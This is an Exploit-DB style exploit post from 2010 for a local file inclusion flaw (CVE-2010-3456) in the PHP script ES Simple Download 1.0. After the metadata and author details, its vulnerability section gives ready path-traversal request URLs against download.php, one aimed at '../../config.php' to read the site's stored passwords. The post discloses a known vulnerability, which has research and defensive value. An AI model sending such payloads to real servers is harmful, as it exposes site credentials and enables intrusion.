ES Simple Download 1.0. - Local File Inclusion

Author: Kazza
type: webapps
platform: php
port: 
date_added: 2010-09-09  
date_updated: 2010-09-10  
verified: 1  
codes: CVE-2010-3456;OSVDB-67944  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comessdownload1.0.zip  

raw file: 14960.txt  
 ----------------------------Information------------------------------------------------
+Name : ES Simple Download v 1.0. Local File Exclusion/LFI
+Autor : Kazza
+email : kazzamagic@list.ru
+Date   : 09.09.2010
+Script  : ES Simple Download v 1.0.
+Price : Freeware
+Language :PHP
+Discovered by Kazza
+Security Group : -GST-German Security Team-
+And all Friends Sites : http://md5cracker.tk - http://gulli.com - http://free-hack.com

----------------------------Vulnerability-----------------------------------------------
+Download : www.energyscripts.com/projects/essdownload/essdownload1.0.zip
+Vulnerability : www.your script/download.php?PHPSESSID="Your Senssid"&file=../*****
+Password Exploitable   : www.your script/download.php?PHPSESSID="Your Senssid"&file=../../config.php
-----------------------------------------------------------------------------------------